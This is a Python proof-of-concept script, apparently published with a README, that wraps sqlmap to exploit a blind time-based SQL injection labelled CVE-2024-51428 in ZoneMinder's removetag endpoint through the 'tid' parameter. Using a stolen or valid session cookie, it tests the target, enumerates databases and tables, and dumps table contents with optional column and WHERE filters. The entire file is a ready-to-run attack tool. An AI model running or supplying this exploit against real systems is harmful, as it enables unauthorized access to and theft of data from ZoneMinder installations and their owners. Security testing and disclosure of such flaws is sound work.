README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import subprocess
import sys
def banner():
print("\n[+] CVE-2024-51428 Blind SQLi PoC (sqlmap wrapper)\n")
def run_sqlmap(cmd):
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1
)
vulnerable = False
for line in process.stdout:
line_clean = line.strip()
if not line_clean:
continue
# detectar vulnerabilidad
if any(x in line_clean for x in ["Parameter:", "Type:", "Payload:"]):
vulnerable = True
print(line_clean)
continue
# mostrar encabezados importantes
if any(x in line_clean.lower() for x in [
"available databases",
"database:",
"tables",
"table:",
"dumping",
]):
print(line_clean)
continue
# mostrar resultados listados por sqlmap
if line_clean.startswith("[*]"):
print(line_clean.replace("[*] ", ""))
continue
# mostrar tablas ascii
if "|" in line_clean or "+" in line_clean:
print(line_clean)
continue
process.wait()
return vulnerable
def build_base(url, cookie):
target = f"{url}/zm/index.php?view=request&request=event&action=removetag&tid=1"
return [
"sqlmap",
"-u", target,
"--cookie", f"ZMSESSID={cookie}",
"-p", "tid",
"--dbms=mysql",
"--batch",
"--threads=10",
"--technique=T"
]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", required=True, help="URL objetivo")
parser.add_argument("-c", required=True, help="Cookie ZMSESSID")
parser.add_argument("-d", action="store_true", help="Enumerar bases de datos")
parser.add_argument("-db", help="Base de datos objetivo")
parser.add_argument("-t", help="Tabla objetivo")
parser.add_argument("-f", help="Columna a mostrar")
parser.add_argument("-ff", nargs=2, metavar=("COLUMN", "VALUE"),
help="Filtro WHERE columna=valor")
args = parser.parse_args()
banner()
base_cmd = build_base(args.url, args.c)
# comprobar vulnerabilidad
if not args.d and not args.db and not args.t:
print("[*] Comprobando vulnerabilidad...\n")
cmd = base_cmd + ["-v", "1"]
vuln = run_sqlmap(cmd)
if vuln:
print("\n[+] OBJETIVO VULNERABLE A BLIND SQLi\n")
else:
print("\n[-] No se detectó vulnerabilidad\n")
return
# enumerar DBs
if args.d and not args.db:
print("[*] Enumerando bases de datos...\n")
cmd = base_cmd + ["--dbs"]
run_sqlmap(cmd)
return
# enumerar tablas
if args.d and args.db and not args.t:
print(f"[*] Enumerando tablas de {args.db}\n")
cmd = base_cmd + ["-D", args.db, "--tables"]
run_sqlmap(cmd)
return
# dump tabla
if args.t:
cmd = base_cmd + ["-D", args.db, "-T", args.t]
# filtro WHERE
if args.ff:
column = args.ff[0]
value = args.ff[1]
if args.f:
cmd += [
"-C", args.f,
"--where", f"{column}='{value}'",
"--dump"
]
else:
cmd += [
"-C", column,
"--where", f"{column}='{value}'",
"--dump"
]
# solo columna
elif args.f:
cmd += ["-C", args.f, "--dump"]
# dump completo
else:
cmd += ["--dump"]
print(f"[*] Dumpeando tabla {args.t}\n")
run_sqlmap(cmd)
if __name__ == "__main__":
main()